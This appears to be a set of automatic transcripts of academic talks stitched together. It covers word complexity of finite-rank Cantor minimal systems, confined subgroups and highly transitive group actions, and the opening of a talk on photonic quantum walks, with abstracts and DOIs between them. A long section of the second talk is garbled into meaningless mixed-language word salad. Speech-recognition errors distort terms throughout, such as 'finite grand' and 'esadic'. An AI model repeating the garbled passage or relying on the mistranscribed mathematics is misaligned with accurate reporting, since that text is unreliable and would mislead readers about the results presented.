in non-superlina complexity so this is a recent part of a recent joint work with Fabian and Juran Alejandro Marz and Samurta Tit and we show that the condition of non-superlina complexity actually fits in this class meaning that if a system is like that has non-superlina complexity then it has to be a finite rank so ease of the form I described before so this gives an indirect they prove that this system have a finite number of ergodic measures for instance using the previous result I mentioned here in the this slide but it's very indirect it's not really optimal in the in the in the sense of the number so then one can ask very quickly if maybe this complexity condition characterizes this topological condition of finite rank and this is false actually even with rank two systems so this is a system that is given by two two vertices at each level in this class in a system like this you don't have you may not have a condition with the complexity so there are examples where the complexity grows more than linear so super linear complexity but is of a finite rank so just to draw a picture here we have the finite rank systems and here inside we have non-super linear this is non-super linear and this is uh these two classes are different and I mentioned in the beginning that this non-super linear class presents some restrictions like entropy number of ergodic measures which are also that also happens in the finite rank but they also have this automorphism group restrictions and asymptotic per restriction so the first question that one could ask is are those uh conditions also satisfied in finite rank system so let me show you some questions these are some questions that we post in the the paper but they are really solved so first question is does the minimal uh finite rank system have many many many finite many asymptotic components and this was solved by bastian spinosa which is a graduate student of alehandra and fabian and this this condition of sorry sorry there is a question of borisolomiaq he's asking how fast can the complexity grow for finite rank oh yeah very good question um I actually I I I wrote it down in the end so maybe we can talk about that again I I actually wrote it that's an open question I want to ask so this is um this was already solved this is I think 2020 and this of course implies that the automorphism group of these systems is also constrained and some other topological consequences or questions that is every factor of finite rank also finite rank this was not clear at all but this was also solved by uh uh let me go lestani bastiano also and go lestani I'm sorry if I pronounce it correctly and joseini this is also 2020 and um this was recently like last month solved by also by bastian spinosa that in terms of symbolic factors this class is also very restricted has finitely many of them have it has finitely many factors up to topological conjugacy and I advertise that we have here talks on on thursday so I advertise this talks that will be on thursday and I I think they will talk more in details about these results so I will just mention them I have another question and related to this all these topological questions one of the aspects I would like to treat in this class of systems is the complexity one so that that is what we are going to discuss more in details in what follows what is the complexity what is the complexity of finite rank systems we know it's a zero entropy but uh what is a possible uh complexities you can see and how how can you control them if I give you an example how how can you estimate the complexity and to do so I will introduce a few notions of morphisms and esadic subsets which are are a bit more convenient to to discuss this question so and here I will give a few more definitions I morphism will be any map I will call it say tow from an alphabet to another one that it's you can think of this as the concatenation of images of any symbols so tow of a sequence finite sequence say of a word it's just the concatenation of the the image of each letter that that's what I will call a morphism I will not call it a substitution because the alphabets may be different so to restrict the word substitution for same alphabet I will call this a morphism and given a sequence of morphisms here positive I will restrict to positive morphisms and positive means that if I write a letter say if I write tow of a I will see some letters b1 b2 etc I want to see all of them so all letters appear in the images of of the letters in the in the alphabet in the in the beginning this is the same as when you construct the matrix associated to this morphism you have a positive matrix and this is not a restrictive assumption all the systems we are looking at can be can be considered with this condition so it's not it's not anything it's not restrictive just to make things easier so we have a sequence of positive morphisms where the alphabets might be different and having that sequence of morphism we can build what is called the esadic subshift associated to the sequence of morphisms which is given by the following condition a point is in the subshift if the finite words of this point can be obtained iterating some letter from far from far away so let me try to do the picture I have a sequence of morphisms this is okay close from an even alphabet the next one and this goes to say tau zero here I have my original alphabet a0 alphabet a1 you have some way to send letters here into words here and the point in this subshift belongs to the this alphabet the first alphabet to the z and the point is in there if when I take any subword of it here I will take a subword this subword comes from iterating some letter in some say alphabet say that this is this is the ak and and you iterate this with all the morphisms and when you do that you have a word that sees this finding word other way to say it is that you start iterating morphisms from far and far away and the limit points you get are the points in the sxh so these are like a generalization of the substitution but you allow the alphabets and the morphisms to change every time so this is a way to to to build what is called the sxhift and what actually what it's proved in the recent results I mentioned is that this this is intimately related to the finite grand systems and how to relate this class of system with the finite grand systems is that finite grand systems are exactly the systems where you can control the size of the alphabet here the alphabet can grow can grow to infinity the size the size can grow to infinity but if you are if you restrict to morphisms that where the alphabet doesn't grow to infinity then you actually get the same the same class of finite grand system and this this will be explaining details I think in the talks on third because this is the it's a theorem it's not it's not it's not trivial I mean probably it's one can expect some some this type of result but there is some technical things to do in the middle okay so the next question is if I give if I give you the sequence of morphisms how can you compute the complexity or is there any way you can compute the complexity so this is the next I will spend the remaining minutes of my talk talking about this so how is how to estimate this complexity without when I give you an example or in some classes etc and well of course there are some non-case substitutions substitution is one that all the morphisms are equal to the same to given morphisms so there is only one morphism that you repeat infinitely many times and this case in this case the the the complexity sublinear meaning it's bounded it's a p of n it's bounded by constant times n another class that is well studied in in symbolic dynamics is the linearly recurrent subshift I will not give that like the original definition but this will be when the morphisms you have a finite set of finite set of morphisms so finite set of morphisms and in this case the complexity is also sublinear so it's a finite set of morphisms that you that you choose how you start iterating and then there is the finite rank which you can ask what are the complexities that are here but this is always our explanation because well it has zero entropy okay so the what we tried to develop was some ideas to compute the complexity in some examples or in some classes and I will mention you some of the tools we saw or we tried to create to to compute the complexity here everything I'm I'm talking about is minimal and the morphisms are positive okay and to understand how is the complexity we will have to look at these quantities so for a for a morphism let's denote the double bar of the morphism the the the maximal length of of tau of a letter so you write down so you have your letter a b c say you write the substitution and you may have that some letters give you a very long word some other letters give you a very short word so I will write with this the longest the longest length and with this symbol the shortest and and actually we'll see that these two quantities are behind the complexity so if you have a morphism where these two things are very different you can achieve very non-trivial complexities like high complexity okay so here there is the first tool to understand the complexity that is and is what we call the repetition complexity and okay the definition I will just write how to compute it suppose that you have a that gives you a a b c a b so what this what this complexity for this quantity means is that you will count for each letter you will count how many times you change the letter but here we started with b with a so I will start with one because I'm using a letter then here I change the letter I will plus one here I change another letter I will plus one here I change another well this is a bad example it doesn't illustrate what's happening maybe let's say that I have many b's and in dn and a so here I am not changing the letter here I change the letter I plus plus one so the this when I do this I count one two three four five six and I do that for every letter so b will give me something say seven and I add all those quantities and this is what we call the repetition complexity with how many times you can you need to change the letter in the in the morphism and that's should be related to the complexity because if you if you change too much you are creating many words somehow and that's exactly what it happens this is a computation that I will just write the like form of it but it can be very it can be done much more precisely and proposition with this quantity is the following suppose you have a sub shift then you can bound the complexity in an n or for a large enough n by so this is a it's not a precise bound but it will tell it will work to illustrate the result so you bound by the maximum of the alphabets of course this makes sense only if the I mean this is meaningful only in the case where the alphabets remain bounded and then you multiply this by the the link soup of this complexity that I defined previously so you start computing how you the morphism changed the letters and you have to multiply that by the size of the the maximum of the alphabets and this is the constant term that goes with n of course this can this can grow but this is meaningful only when this is bounded because it will give us some information when the system have sublinear complexity so if you have a static sub shift where we can bound these two things then the system has sublinear complexity sublinear complexity these are are quite strong conditions but I included it here just to illustrate how to use that notion but it can be it can be described much more precisely we can talk afterwards if you have a need and as a consequence of this result we did use some results in the equivalence strongly or with equivalence theory that says that if you have any finite topological rank then it's a strongly or with equivalent to something of sublinear complexity meaning I will just say it with words that means that you can send orbits to orbits in a somehow continuous way but this notion reserves for instance the set of infinite measures and some other under dimension group of course and this proposition gives for instance an alternative proof that the finite rank systems have finitely many agroic measures because you it's equivalent to something of sublinear complexity but of course there we lose the precise bound which is just an observation and so this is this complexity notion allows us to compute some things but actually there is more precise notion that we described that is the complexity of relative complexity of morphisms this is somehow how are how the morphisms in the aesthetic representation are being related so I think I have very few minutes so probably I will skip that part if you have if you want to take a look at this we can talk afterwards but this is a more precise notion to compute the complexity the previous one is easy to it's easy to compute in examples but it is highly non-optimal to compute the complexity this one is a bit better computing the complexity but it might be more complicated in examples but okay I will skip this because I'm running out of time okay and the consequence of these computations is that one can say when a system has zero entropy and it's it has to do with the the length the how the alphabet the exponential growth of the alphabets compared to the smallest word of the sequence of morphisms this is probably for poor result but we gave a very concise proof of this in particular finite rank have zero entropy okay so I wanted some other consequence that sub quadratic complexity is always true when you have two alphabets of size two and okay since I ran out of time let me go to the questions which I probably are more interesting so here are a few questions that are still open maybe the specialists can say if they make sense like people that have worked more on finite rank system so the first thing is if you can control in a polynomial way the complexity of a finite rank system so can it be can you find a degree that controls the polynomial the complexity of the finite rank system or maybe not and give an example where you cannot do that this is the first question so what I said previously that when the alphabet is of size two you can do it and the second question is if you can characterize complexity and having topological finite rank in some subclass of systems for instance we don't know if these conditions are equivalent in the topics class maybe in the topics class having finite topological rank is the same as having non-superlinear complexity there is some evidence that supports that but I will not mention that we can discuss it later if you have any questions and then we have a variety of other questions okay thank you Sebastian maybe we can pass to the questions there is a question in the chat room of Seijat Babel he's asking what can be saved the minimality condition is replaced by unique minimal subset in the in particular in the result of finite rank when the condition of non-superlinear complexity implies finite rankness if you have I'm not sure I I should replace I'm not sure like what happens if you drop the minimality probably you can say things but I haven't thought about it okay there is another question of Martin Lustig he's asking the chat and say what about for placing for subchips the water diversity rank by the by a nestadic rank defined through the existence of a nestadic development which is everywhere growing of buddha the level of a betranks and perhaps also recognized recognizable on each level this yeah um and you mean not not positive maybe I think actually this question of Martin will be it's one of the things that will be discussed on Thursday I think that's one is a recent paper of for Bastia and Spinoza where he addresses that question uh if I'm not mistaken I think there is some development of that other question a question of uh Dan Rust uh will you what's that the lens of each morphism is bounded what's happened in this case related to Martin uh Martin questions no they don't need to be bounded bounded they can the size can grow which will always happen if you telescope the diagram like if you look at it in the in the Bratelli version but you can you are allowed to do that okay so let's thank Sebastian
|
I will comment on recent results concerning the topological properties of finite rank Cantor minimal systems. I will mention some ideas to estimate their word complexity and ask a few open problems.
|
10.5446/54143 (DOI)
|
drž antiqueih, da flagshipen vse sem ber iz files拜거 d s dozenovati za vome tror da ne bila po Hondičaju, za bi Otcočje, the I'm Interested in the Space sub g of all sub root sub g. So this as you might know, is you can see it as a compact space if you put on it just the product topology. so you can see it as a subspace of the set of all subset of G w vaš globa dnja obal tri dajbina dne habe油, ili tko bo v duži obal sred Father shaking, Mr was spoš ambastari Sidăj vsat. Tako je bo zašpe Stare china dobles� já, bo mene motiviram octendear, dole skoolo poveva jin... skills part of G issmie are still cool. Until then target of these three very large demoboards Sa beseš sem igratenima ge орбит. Woj 550, jednoj sej po Almightyga kot začetu jeㅋㅋㅋ l 시작u, jazệ행ha začet hasa, Tudi ne se taj apparatus strup Ovilejnjo se Bundesregierung ukose den konjučnost kot cosBre consulted dread. Privu bathrooms ne kuj procedures z privuQue. Krstopiva je moji hrcoatianjekel abut na strinjenje v kombiug Julie vsimiiljenreg. Predstav Djel arsenali,�를 egzbo candles zančati ni neko zar mercy iz naši obtuki trendy sve, ordered ko intriguingash zar iz naš nek 快i. To je sp nawetutine. On je te zdesida, sva rež Choppa. Gesidelje del intro. Š estruct se novath pertas di😊 wider iz CCTV in mandipk in P binge. Ge. JoeyISA. Ye.кихlocka takim z걸imi. Tagli, ko smelje to v g- 넘obikohice, je to vzign tudi vasto razli sub set, g minus identitv. T irmale, je alpo b Aziz tweak in t... krin i format evožič gla kamu z Romciber trainski tunnel. Ar demonič viscosity on zdaj s pozdaj setupi. In genBS, in je koneks karbe gradientiv.ata, je pri templatei votes, zato prephoto delaj toga kot�뤚ega. Z dessenov raz рав in iz kas ready sport tenemos If we knew when we though we know how bright tk tk we know k Bosk已經is na sietej. Ab k Sat radio ChiTube precisij Mi forum, stavljet pomoje boilsimosgga. Ev pošrednepr, rej fibers pent champagne, te del da se nas gostovujem naück알, in neval post au dama tukari, so glils roh tega. Ma bo veča, Tako, različite pa zelo sm pewn Ministro, ki imamo hab bloody, k巧 drugje finist mathematical se n易 podredil, znis tournako potretih sewnov in kam n軍 bez nilaka probitnom glasbenje slides, are je po vojtende neno tukaj, čas druga prana, je za tukaj, affairs te pil, In se dve ovo ni requuriss modify,poonje in julje vníenedi tukob väljenje bo, veseli vwožetności maučosti, na kąda t lesbian mincedimi jažet stayst wrote, Vedno povedajta, that we give another definition. Ano пример. Assume that G eigens u x, in gebautn the combustion sugar is a large combo. And... Te sem toesto hombreë je, naajo ko sv még je provbenja Initiative, Ne lepo v t sideways jou pri mailboxnici. N Takorien하하, pieces are an gett on n responsibility. 위 stojاي p garbage that Prayer docet in Insumpy. J Demo. La speechlessdi. Aj, pa pomelaj da pozor bugs vzačnjak vsega mesefanje, kot kar tablet neko which to mas låonega. Uz scrollenja ne ta operate probAudienceS t Unterstüti so in t equally believe me, pa da se populations, sk 그런데zigo, bi chilling quad suggestionou never t Lenico, yn med vibration. voud na id o trud Así, pa.ittle min isolation aktаться touched kDA sono dol proje modern karli,zo ta v indo knobs piz twenty minus zelima, najnico, resume int smok RubρBHš. SredneITE nR hip acoustic queue, o choji. To se da tokjiga v tega pile vcheopa. Naätzte, kg nR1rgh pol. T Komenvironment 230 r. U nekaj postali, Čblefi tudi suking, ki je nis радjare, da je pograbio. Be confined substitute.? Just an exercise from that definition see? n for minimal options, this equivalent? together.??? with Adrián we have been studying a lot this notion and turns out that studying so it's, not because what is your interest, but there are na globalnih lahre. Katera Ste demands to moinssoniste obثرaj, in so to preasto za danes vmbrej radio Josh Angamska quero nosni, kaj so zelo neko nas oču bo raditi. Psac Boje, swoje je zabračove. Zo je vem уж zரado, kaj sk台灣 on Kubernetes lanči pogledi, kaj oni不會 pristate za sa tire krovite. ne bo prototype. Prefmer vse forbinite ide opotitv lovegeti. regiditi v proberte glupci simulatorer in kompaz meringue. Iena, da tudi pani appearedno coda, kvešite plik скороite gluzeitignji problem vredjili to je toga05ayd красnothing v breedku ginke tudi je poza in drožitama z vaso komendu K wisdomid gafer verslede, ker nedi o supopiri vso bo Melt honorary Premium j downtown. Dobranje popazo za kojena. svanje calculator do celim ob z pasturevorego, kot iz F k reactsivonaru da nje incelernemрезnega in благostanj계. Zaselję je okced po vzlučofri nad director vo heated kaj radi iz gračanske in ale httpfunسke. U St Such- прямо ona da res oaaaaa mascara, vspoljene kložim presentedapot motions, z kanasi tak drizzle pologini ta graha kon mod leave up method.III. sk Musk. Da jugujem spisteleobrenjisih k Neverombominga k kaj bo o dino u kar Vežnici pozdonili su Gone ki je Sabon zapotena Novinoding zapotena Tako stranovorine, vs. kDomisme, kajweight moguš trvariti, Given osl Edit, pa se n台anas i菌v. Series angle diagram pom tej strančewor. In schedule to je deleted. soće, ki je h semicidifast, klad le 37 server'te,....................................... in se leje inFF. Pred njih uא imače drugajo om digit за association hršovati geomomorf -" logo – osoj verge. v Gestivu, if and only if the associated homo morp Punktezi korist okrti. In najm menos.toП ded р tA prva tako vrstskepo soolosti, pa neaminjete namz gerçek armor in kajme let len wom ustal letljemo. O supply. Jae pa reload ungefähr, Saint Diane, mozehoj transparento vjaz casingile. Zelo? Tako Plato. Zelo pokazan, ki vrvo naéga bo v evenlyčen《Trip Over Group》 za vse allez. Se, ta pro定i ogr powdered, in da ja zidi s edadi mai naicer točne oblavov moje vavste, Stara meditate, če odbena je začunka. To je poživite. OK. 보이čei Rod OK tam ca odbojimo jo, to je absorbe наши z TierTHEi draži tukaj, začinja z pedaluing Pro EpRedде, zato jeampedi dolar in do Pirupov. Zato je to per fryingi mr respect. Vsah nekaj bilo od 크�asov stizado. Wsah Tako igratvar... Gyri rebound z d Teenor. Selo je toooky še искite lalko, če aj več pri Masterubs vo mlad over vozosenler ko je ukupaj primerim osobul. Čakooo, bo nezẫnena je iz Stimula, mač ne når tempting, in nam je jenes Finish Which mod vozonddon. Zтра sem je relied sharket 19räv- Zelo malo drž翻 prot močno, ko je zelo HIV. Eh. Mil effective. so jaz za tudi vastiet. Z Nosov kako, pa je trendu, čefa jo ono dopoz likely c outsiders za tukvov tukve ker pa jeredit tukko bila da dane そう ka nahetgt prosn mlad stv storms s viskem in glasba, advances z u snacks u tie だ in alesine, kar bi zamokame, kar ni trafashionedфructuresre, curve crossed trees porte munda fraji so, kar goroj pred saj, la jug exitote, sk transplanti se razsivite, pa vite se in sa družem K-ை, ki tem grilling. Alts. Ok, so in inter... Of course, every subgroup of it, which contains that, is still highly transit. Now, why do I call this... Somewhat trivial examples, because they're not really trivial, but they are very, very well understood somehow, this class of examples. So, because you can... So, first of all, if g is like that, it contains a normal subgroup, which is isomorphic to a finite realternating group. This is a very restrictive algebraic condition. And so, by the way, this is... Let me write proposition definition. We say that g is partially finetary. Part... So, partially finetary, finetary, if it satisfies one of the following equivalent conditions. So, the first one is this one. The second, if g admits highly... There exists highly transitive faithful action containing... g contains an element of finite support. So, whenever you have a highly transitive action, it's easy to see that as soon as you have a permutation of finite support in your group, you get the alternating group. Just because, using high transitivity, you have all conjugates of the permutation. So, you have a normal subgroup in the symmetric group. And three... I want to write... So, the same, except that instead of highly transitive, I can just assume that the action is primitive. So, primitive means that it does not preserve a non-trivial partition of omega. This is a theorem, a classical theorem of Jordan. And... Rediscovered, I think, from the 19th century. So, it's a class of groups that you understand very well. And moreover, in this case, the action of g on the set omega that appears is the unique highly transitive action of g. Okay? This is a very classical permutation, like theory of permutation groups. In this equivalence, it's not so hard to do this. So, when you have a group, which... Okay, that's... The presence of finitely supported permutation in a highly transitive action is somehow a very special condition. And it's sort of a separate world. So, I'm interested in studying groups, which are highly transitive actions, in personal, if I need to be. I shouldn't have... Okay? So, more interesting examples. Non-parcialive, finitary examples of highly transitive groups. So, one is non-Aberian free groups. This is also not so... Actually, not so difficult to see, but so here, I have a long list of differences. Where is it? Okay, this is the original tool. McDonough. In the 70s. But from this, you can actually generalize a lot these results. So, surface groups also do this. So, this is a lot of critters. And I could continue this a lot. The point is that surface groups share with free groups the fact to be hyperbolic groups. So, this is also true for hyperbolic groups. It was generalized later by Chynikov. And there were a lot of results for groups with hyperbolic properties, establishing the existence of a faithful highly transitive action. So, the ultimate result in this setting is due to... So, the nth result is due to Hulen Noseen, who proved that all acylindrikali hyperbolic groups......and meet, actually, plenty of high transitive actions. I won't give the definition of acylindrikali hyperbolic group, but it's just a generalization of the notion of hyperbolic group that covers really a lot of examples, including hyperbolic groups, mapping class groups, and so on. There are more results for groups acting on trees, for instance, due to Pierre Fima, François Alémaitre, So, you moon and you staldair, and for subgroups of SL2, whatever. I will stop here for this list. And there is another source of examples, which is much closer to the topic of this conference. So, Nikola, there is another question on the chat by Vile Salot. He said, so sorry, I missed something. What action is highly transitive for this? No, it's not the lobbyist how to see. So, these groups come with a natural action in a hyperbolic space, for instance, but you don't see the action directly there. The way this is proven is by some sort of small cancellation theory over hyperbolic spaces. Not really, but arguments that are... So, what you want to do is to construct a subgroup H, so that the action of G on the coset space of H is highly transitive, and you approximate H successively. I'm actually not super familiar with the proof by using some methods that resemble a lot the small cancellation theory over geometric versions of small cancellation theory. So, it's really not explicit, and it's not obvious at all why such action is... So, a second class of examples, which is quite different, is the topological... So, if you take a group action minimal, so if you take X to be a counter set, and you look at a minimal group action of any group on X, then you can look at the topological group of the action... of... So, let me not try the definition, because I won't really use it, but let me say what it is. It's just the group of all homomorphism of X, which locally coincide with elements of G. So, this is a very flexible group, and this is highly transitive. So, it's highly transitive on each of its orbits. Whenever you have... On in X. Whenever you have an orbit, you have so much flexibility that it... So, here you do see natural highly transitive actions, and a special case of this that will be important for me is the Higman-Thompson groups. Let me write it here. Vd. So, what it is, you take X, now to be X index by d, the one-sided shift space over d-letter alphabet. So, it's a counter set. Now, for a word, w in finite word, in the alphabet, so this is the monoid generated by the alphabet, let cw be the cylinder set. So, the global set of all sequences that start with w, and you can define a group, a very natural group, which is locally given by take a cylinder set, take the w, and change it to another letter. So, Vd is the group of all homeos, g of X, such that there exist partitions into cylinders, X equals cw1, and X equals cv1 of the same, so the n is the same, the same number of pieces, so, such that g axis follows, whenever it sees an element, which belongs to one of the pieces of this partition, so it means, which starts with some word wi, it changes to the corresponding pieces down, pl word down. So, this is the man Thompson group, and it's a special case actually of topological. So, this discussion raises two sorts of problems, so, in, when people study highly transitive group actions, there are by now really a lot of results about the existence of such actions, which might be counterintuitive for some groups, like, many groups admit faithful highly transitive actions, but what is missing somehow from this discussion is the following two general problems. Okay, we know that highly transitive actions, there are many, find some structures, so, classify the highly transitive faithful, so, they are very general problems, it's not a specific question of groups, so, beyond proving that they exist, once they exist, one can try to find classification results to understand the structure, actually, when we started this project, I think the only, the only known result in this period is this one that comes from the Jordan theorem in the 19th century, but for none of these cases there was some understanding of the possible highly transitive actions, and the second problem is, there is actually a lack of interesting obstructions in the way of the highly transitive actions, so, there are a few elementary properties, I don't want to get into this, it becomes more algebraic, but one can list a few sort of kind of trivial obstructions, not so trivial, but not so difficult to, for a given group G to admit a highly transitive action, but this is something that is not well understood, so, it stays at a very algebraic and elementary level, maybe I'll tell a bit more about this later, first I wanna get to the actual topic of my talk, so, to the actual results I wanna state, so, remember I started talking about confine subruss, so, now the result I want to state is a link between the notion of confine subruss and high transitivity, so, which says that essentially, when you have a group acting highly transitive somewhere and you have a confine subruss, the action of the confine subruss essentially remains highly transitive in the following sense, let G acting on omega be a non partial finetary, so, I want to exclude the case there, highly transitive action, faithful action, let H be a confine subruss of G, G, then there exists a confine H invariant subset, so, we finite complement, so, that the action of H on omega zero is highly transitive, so, the action of H remains highly transitive if you admit to discard finetary many points, so, this can be useful in both directions to understand confine subruss once you have a highly transitive actions, and once you understand confine subruss of a group to understand its highly transitive actions, and that's the direction I want to explain, because the point is that a confine subruss of a group can be much smaller, much more constrained than the group itself, so, the fact to know that the action of a much smaller group remains highly transitive is a strong constraint, so, let me, so, some applications, two applications, we started at, so, how much time do I have? We started at 40, 38, so, you have, like, 10 minutes, so, first application is related to classification problem, so, it's not immediate corollary of this theorem, but this theorem can be used as a tool in certain cases to find some classifications, and I'll just state an example, which you can maybe guess by now. So, theorem two is that every faithful, highly transitive action of the Higman-Thunson group v d is conjugate to an orbit, is the action on an orbit in the counter set. So, here, you see a family of highly transitive actions from its natural action, each orbit gives you one, and these are the only ones. So, it's not immediate how to deduce this theorem from that, but this is really the main tool. There is some arguing from here to that, that I don't want to explain now, but let me just say that the point is that here, we know that since in the standard action of v d, all stabilizers are confined subgroups, and even stabilizers of finite sets in the counter space are confined. So, using that theorem, assuming that this is not the case, we managed to show that, this theorem essentially implies that if this is not the case, then stabilizer of finite set in the counter set must act in a highly transitive way on the mysterious highly transitive actions when one is given. So, it tells you that their action is very rich. This information you can turn around to say that if you're given an arbitrary highly transitive action of this group, and you look at the stabilizers of intervals of points and for that action, they must act in a very rich way on the counter set. Because saying that subgroups are highly transitive is sort of saying that your group that composes in the product of these two groups. And now, so we can work with the action on the counter set, we know that stabilizers must be very large subgroups of v with respect to its action on the counter set, and by working we managed to prove that actually they must be either the stabilizer of a point or the whole thing. That's how sort of one proceeds. OK? So now I want to give you at least to state another application that is related to TRM to the other problem, which is also pretekst to advertise a class of groups that might be pertinent to this conference. So, I want to explain you how to obtain a class of non- highly transitive groups which do not satisfy the really obvious obstruction to high transitivity, also arising from dynamical systems, like as groups of dynamical origin, I would say. So, for this, let me start with... Now let's go back to really dynamics. Let me take x, v minimal counter system. Where x is a counter set and phi is just a homomorphism, so an action of z. OK? And I want to define a group that is associated to the system which is sort of similar to the topological for group of the system, except that I will define a group which acts not on the counter set itself, but on the mapping torus of the system in the suspension space. So, for this, let me define y, phi to be... So, the suspension of the system. So, the quotient of x times r, where I identify, so... the suspension. OK? So, this is just the mapping torus in the user sense. Now, the idea is to look at groups that are by homomorphism on this suspension space. And so, for this, let me first just give you another... f5 minutes, right? OK. So, I will make it. So, in order to understand this space, you can think of it, so this space is obviously locally a counter set times r, and there is a natural system of coordinates actually that I want to introduce explicitly to define the groups I want to talk about, which is the following. So, let me first call them charts. So, for c, a club and set in the counter space, and i, an interval of length smaller than 1, when you look at the product of c times i, and this is the subset of the thing that you are questioning, it injects in the question, because there is no equivalence relation there. So, this, you can identify it with a subset that I will denote u c times i of the suspension space. And this identification gives you sort of local coordinates of counter set times r in here. So, I want to define a group, which acts by homomorphism on this space by preserving each orbit of the natural lamination of the suspension space, but in coordinates is given by p l, piecewise linear homomorphism of r. So, homomorphism that are piecewise affine, piecewise of the form a x plus b. So, definition, and this is a family of groups that we define with Mikalatriostino. So, I'll note p l phi, the group of all homomorphs of the suspension space of phi, such that for every point in the suspension space, there exists a chart containing the point. And homomorphism from i to some other interval, which is piecewise linear, p l, with finitely many breakpoints for the derivative, such that when you look in coordinates g in this chart, so you can, it maps it onto the restriction of g to this chart, it maps it onto the chart defined by c times f of i, and in coordinates, what you see is just the identity times f. So, basically, you have these small flow boxes, and your group is acting by elements that act on these flow boxes, like in a piecewise linear merg. In a piecewise linear merg in the flow direction, and identity means that preserve every leaf, and the jump is locality constant in the counter direction. So, these groups we introduced with Mikalatriostino with a completely different motivation, because they are interesting groups that act on the real line. And actually in there, so here I take all possible piecewise linear homomorphism, if you restrict to accountable set of piecewise linear homomorphism, for instance, the so-called dyadic ones, where you ask the slope to be a power of two, and the constant term to be a dyadic rational, like in Thompson groups, you also get a subgroup of that, which is analogous to the Thompson groups, if you know what it means, and we were interested mostly in that, because we proved that subgroup is a subgroup that subgroup is finitely generated when phi is a subshift, simply phi is minimal. So, that gives you, for instance, a finitely generated simple groups, which act on the real line. And it has other properties, but now I don't want to talk about this, I just want to say that this construction also give, so, if you're in free that we proved it again, and what it means, is that if you take x phi any minimal counter system, and you take g, a subgroup of this group of piecewise linear homomorphism of the suspension fluid, just defined, which is such that the action of g in the suspension space is what I defined at the beginning, topologically nowhere free, far from being free. So, each point is fixed, a neighborhood of each point is fixed by some element, it's large enough, and it has no faithful highly transited action. In the point, I don't want to get too much into the details, but the point behind this result, it also uses the, of course, the main result I stated before, is that under this condition, stabilizers of points of the suspension space are confined subgroup of g, and in this group, it's stabilizers of points in there, look very, very differently from the group itself. The reason is that when you have a minimal ammunition like that, if you're fixing a point, and by definition you're also fixing as more transversal, then you can sort of decompose using the first return map, you can decompose the space into long rectangle, which are preserved by every element in the stabilizer of a point, and so basically this tells you that the stabilizers of points in here look like groups that act by piecewise linear homomorphism on an interval. And this is a much more constrained class of groups, because, for instance, you have, they cannot, I said here there are simple subgroups, they cannot be simple because you have slow pod extremes, it's known that they cannot have free subgroups by result of brain squire, and we actually generalize these results of brain squire as a small generalization to prove that they cannot be highly transited, so it's along the same lines, and then using the theorem, we can analyze from the stabilizers to the whole group, that's the main idea behind, and I stop here. Thank you, Nikola. Are there any questions online or here in the room? Yes. Vaj, François le metre. So you mentioned that these pigment groups, they can be viewed as topological full groups, so do you have any other classes of topological full groups for which you hope to have a similar statement? No, so this is an excellent question, thanks, and there is a sort of immediate generalization which is topological full groups associated to one side the shifts of finite type. The human tonsil group is behind the full shift over the letters, and you can look at shift finite type, but one sided and you have a similar class of groups, it works for that. Otherwise no, and it's a super interesting question. We use some specific properties of the dynamics of the actions of these groups to deduce the theorem from the main one. Thanks. Other questions? On the chat, Samuel, there are some questions. So can there be the action that are any transitive, a vile, answer no? I didn't understand, sorry. Are there z-action that are highly transitive? No, no, no, sorry. Of course, every z-action is just either the action of z-on itself or the action on a cycle, so it's never highly transitive, but I should mention among the sort of obvious obstructions is, of course, a billion groups are never highly transitive, and actually also solvable groups. Every group satisfying a law is not highly transitive, and it does not admit any highly transitive action. So even solvable groups don't, for instance. Okay. So if there are no other questions, let us thank again Nikola.
|
A subgroup of a group is confined if the closure of its conjugacy class in the Chabauty space does not contain the trivial subgroup. Such subgroups arise naturally as stabilisers for non-free actions on compact spaces. I will explain a result establishing a relation between the confined subgroup of a group with its highly transitive actions. We will see how this result allows to understand the highly transitive actions of a class of groups of dynamical origin. This is joint work with Adrien Le Boudec.
|
10.5446/54096 (DOI)
|
What I want to do in the next 45 minutes is I want to talk to you about time-multiplex quantum walks. This is a research line which we have been doing in Paderborn for at least 10 years or longer. So we started that quite some while ago. And as you can see from this picture, we experimentalists. I'm aware that the audience is probably more theoreticians, but I hope I can inspire you to make some suggestions to us because we do need you guys. We have to know what should we do, what would be interesting to implement. Because Paderborn, I'm aware, is not the most famous place and quite frequently in an internet audience, people ask me, but where is that? Well, it's kind of in the middle of Germany. So this is Germany. This is Paderborn. And believe it or not, it's a really old historic town. We even have a cathedral in a bishop. It's a beautiful middle, well, little scale, German town, and we enjoy working there. So this is the cathedral. This is the smallest river in Germany. This is the town hall. So it's a quite nice place. We like to be there, but there's a second reason why we are there and what's important for us. IKO stands for Integrated Quantum Optics at Paderborn University. And one thing which makes this place special is that we have an on-site nonlinear wave guide fabrication facility there. We process different nonlinear wave guides that let's you know a bit, put us into two different first aid wave guide writing, periodic polling. Now, why is it important? Well, it's important because if we want to implement new systems, modern systems, we also need the technology. And although you're furthest away, maybe I want to do a little bit of advertisement to tell you why we need that. So let me tell you a little bit more about my group. So we do what I just say, these technology things, Christopher Eign is a group leader, where we really go to the lab, to the clean rooms and we fabricate things. That's something which is maybe rather different. And actually I started that business also approximately 10 years ago. And I have to tell you it's also big fun. We build out of these things devices. The group leader there is Haraj Haman. And devices really means where this, we might ask, where's the difference? Well, you first have to start from something. So you just have a wafer and then you have to structure them and build them. And then you go to the optics labs coming already closer. And you build these little devices where you, well, here you see that there's electrodes and so on. And then we do the quantum experiments. The group leader there and my group is Benjamin Brecht. And this is what you know. This is, I call this group quantum networks. And here you see quite prominently quantum walks. We do that because I think a really spill-leash and photonic for quite some time, we didn't develop so much technology, but if you really want to do this in the photonic platforms, we do need more technology altogether. Now what is our goal? Well, in very general terms, what I'm interested with my group is to build large scale quantum networks. Why networks? What does these networks mean? And what is the idea behind networks? Well, this comes very close to what you used. I think a network, and quantum work is a special network, is an ideal platform to use that as a model system. We can really take away a lot of these complexity, which is just technical. And we can understand in these models the effects, what effects to really influence what properties. And if you think about applications, and at the end, I'm also driven by application but in a rather abstract way, of course, fundamental is also interesting. Of course, networks, people immediately associate with the quantum internet. Yes, that's true. Also to understand dynamics in an internet system, it's also important to have these networks, but it's far more region. We can have model system, well, for brain neural networks. We can study transport phenomena, and I think a lot of you are things, and we can use these networks to really understand what's going on. Now I hope that I convinced you that network is an interesting system, and if you go to computer science, of course it is. If you look what machine learning is based on at the end, and what all these things is, a lot of modern, well, architecture and computer science relies on these networks idea. I think one thing which is not so clear is, what is really the role of quantum physics if you had complex large-scale structures, and the networks stand for that complex large-scale structure. What does it mean to go quantum? And also, I have been doing that research, I think, for more than 10 to 15 years, I still think that the question of quantumness in these networks is still quite an open question. In particular, when you 